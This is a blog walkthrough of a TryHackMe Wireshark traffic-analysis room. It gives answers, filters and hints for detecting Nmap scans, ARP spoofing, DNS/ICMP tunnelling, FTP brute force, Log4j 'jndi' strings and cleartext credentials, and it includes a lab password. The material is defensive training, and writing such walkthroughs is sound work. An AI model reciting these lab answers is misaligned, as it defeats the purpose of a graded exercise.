Skip to main content
HashnodeSOC Analyst LabsSOC Analyst Labs

Command Palette

Search for a command to run...

Wireshark | Traffic Analysis

Updated
8 min read
U
Umamaheswari B
👋Hi, I’m Umamaheswari Through this blog, I share visual walkthroughs and hands-on investigations on PCAP, phishing, Splunk, ELK, malware, and digital forensics—based on labs from TryHackMe, HackTheBox and CyberDefenders. Feel free to connect or ask questions — I am more happy to help.
Part of seriesNetwork Traffic Analysis

Task 2: Nmap Scans

Use the "Desktop/exercise-pcaps/nmap/Exercise.pcapng" file.
What is the total number of the "TCP Connect" scans?

Ans: 1000

Which scan type is used to scan the TCP port 80?

Ans: TCP Connect

How many "UDP close port" messages are there?

Ans: 1083

Which UDP port in the 55-70 port range is open?

Ans: 68

Hint: Remember, half of the traffic analysis is done by hand when using Wireshark. Filter the traffic as shown in the task, then filter the destination port (UDP) with the "filter a column" option. Finally, scroll the bar in the packet list section and investigate the findings manually

Task 3: ARP Poisoning & Man In The Middle!

Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file.
What is the number of ARP requests crafted by the attacker?

Ans: 284

filter only attacker IP

What is the number of HTTP packets received by the attacker?

Ans: 90

MIMA : all http traffic is going to attacker , destination IP’s are different but MAC address is same

What is the number of sniffed username&password entries?

Ans: 6

Hint: http POST (contains only 1 username & 1 password ) data , which are sending to attacker MAC address

BUT in “ /secured/newuser.php” = it has multiple usernames and passwords

so Include URL too specific

What is the password of the "Client986"?

Ans: clientnothere!

Hint: lowercase = client986

What is the comment provided by the "Client354"?

Ans: Nice work!

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file.

What is the MAC address of the host "Galaxy A30"?

Ans: 9a:81:41:cb:96:6c

In DHCP protocol section: find Host Name filed, add it as column (if wanted only)

Right click on ethernet MAC address — copy — Value

How many NetBIOS registration requests does the "LIVALJM" workstation have?

Ans: 16

then we got both type of requests Registration NB and name query, let’s sort only Registration

these request’s type are specified in field: opcode , right click — apply as filter — and selected

(adds opcode type selected to query)

Which host requested the IP address "172.16.13.85"?

Ans: Galaxy-A12

When a host requests a particular IP address (saying, “I want this IP”), the DHCP server checks its IP pool. If that address is available, it assigns it to the host.

In the DHCP protocol, requested IP address is stored

Right click —> prepare as filter —→ selected — change ip address to 172.16.13.85

Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file.

What is the IP address of the user "u5"? (Enter the address in defanged format.)

Ans: 10[.]1[.]12[.]2

What is the hostname of the available host in the Kerberos packets?

Ans: xp1$

  • CNameString: The username.

Note: Some packets could provide hostname information in this field. To avoid this confusion, filter the "\(" value. The values end with "\)" are hostnames, and the ones without it are user names.

Task 5: Tunneling Traffic: DNS and ICMP

Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file.
Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?Ans: ssh

Hint: data.len > 200 and icmp

data in ASCII

Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file.
Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

Ans: dataexfil[.]com

dns, see any suspicious domain, long , base63 encoded string, domain is same, subdomains are long and encoded

lets sort only this domain, see how many requests to only this domain = 10096 packets

Task 6: Cleartext Protocol Analysis: FTP

Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file.
How many incorrect login attempts are there?

Ans: 737

ftp.response.code == 530 : to check incorrect login attempts

What is the size of the file accessed by the "ftp" account?

Ans: 39424

They have to login successfully to make changes, access, upload files and more

so lets filter successful logins

follow stream : You can select any packet — these 2 IPS conversation(not only successful login packet)

It reassembles all packets in that connection (the conversation between two IPs and ports) and shows them as one continuous chat — just like reading the full message history between client and server.

or To just check the file size requested by any ftp connection

213: File status

The adversary uploaded a document to the FTP server. What is the filename?

Ans: resume.doc

I think HE uploaded README file not resume.doc

All he did: download resume.doc (RETR), MDTM( checking modification time and date) — cwd uploads (changing directory), uploaded README file (STOR), again make a directory named (testdir) then again deleted testdir) , cd / , try to give more access permissions to resume.doc (chmod 777) to read, access,execute file, BUT this account(anonymous login here) has no privileges to change , to modify file permissions

The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

Ans: CHMOD 777

Task 7: Cleartext Protocol Analysis: HTTP

clear text (http, http2) methods(GET/POST), response codes, (url contains, )

Use the "Desktop/exercise-pcaps/http/user-agent.cap" file.

Investigate the user agents. What is the number of anomalous  "user-agent" types?

Ans:6

Total 6 User-agent types are there: nmap, sqlmap, mozilla, wfuzz, google chrome, microsoft

What is the packet number with a subtle spelling difference in the user agent field?

Ans: 52

Use the "Desktop/exercise-pcaps/http/http.pcapng" file.

Locate the "Log4j" attack starting phase. What is the packet number?

Ans: 444

press (CTRL+ALT+7) to apply time in UTC Time and Date format

start filtering this: to find log4j attack

  • http.request.method == "POST"

  • (ip contains "jndi") or ( ip contains "Exploit")

  • (frame contains "jndi") or ( frame contains "Exploit")

  • (http.user_agent contains "$") or (http.user_agent contains "==")

Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)

Ans: 62[.]210[.]130[.]250

follow HTTP stream — Copy base64 encoded string — use cyberchef

to decode(From Base 64)

to defang (Defang URL)

Task 8: Encrypted Protocol Analysis: Decrypting HTTPS

Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file.

What is the frame number of the "Client Hello" message sent to "accounts.google.com"?

Ans: 16

Hint: "Protocol Details Pane --> TLS --> Handshake Protocol --> Extension: server_name" can help.

Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?

Ans: 115

Adding key log files with the "Edit --> Preferences --> Protocols --> TLS"

http2: now we can view encrypted traffic

Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)

Ans: safebrowsing[.]googleapis[.]com

Investigate the decrypted packets and find the flag! What is the flag?

HINT: You can export objects after decrypting the traffic. — select HTTP

Task 9: Bonus: Hunt Cleartext Credentials!

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.

What is the packet number of the credentials using "HTTP Basic Auth"?

Ans: 237

What is the packet number where "empty password" was submitted?

Ans: 170

Hint: In this Credentials windows it only shows the usernames , not the passwords. So select the username , it will take us to the corresponding packet , then right-click — choose Follow → TCP Stream, it displays the entire conversation that took place between the two hosts. SHOWs password used

Task 10 Bonus: Actionable Results!

You have identified a malicious packet in Wireshark — it contains the attacker’s IP (source IP), or maybe their MAC address or port number.
Now you want to block that attacker from sending traffic to your network again.
Select the packet containing the attacker’s IP, go to Tools → Firewall ACL Rules, and choose your firewall type.
Make sure Inbound and Deny are checked. Then, select the rule you want to apply and execute or export it to block the attacker’s traffic.

Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.

Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?

Ans: add deny ip from 10.121.70.151 to any in

Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?

Ans: add allow MAC 00:d0:59:aa:af:80 any in

uncheck DENY

Congratulations! You just finished wireshark traffic analysis room

If you like this content, make sure you visit the following rooms later on Tryhackme:

I would recommend Learning the following way:

  1. Tcpdump, Wireshark, Network-Miner

  2. Snort and Its challenges

  3. Zeek and its challenges

  4. Brim

Use the search option to find them! Happy Hunting!

#wireshark#tryhackme-walkthrough#network-traffic-analysis

Comments

Join the discussion

No comments yet. Be the first to comment.

Network Traffic Analysis

Part 5 of 9
Up next

Snort | Tryhackme Write-up

Learn how to use Snort to detect real-time threats, analyse recorded traffic files and identify anomalies.

More from this blog

S

SOC Analyst Labs

39 posts

Hands-on blue team journey covering phishing analysis, threat detection, threat intelligence, network and endpoint log analysis, web traffic analysis, and SIEM monitoring on TryHackMe and Let’s Defend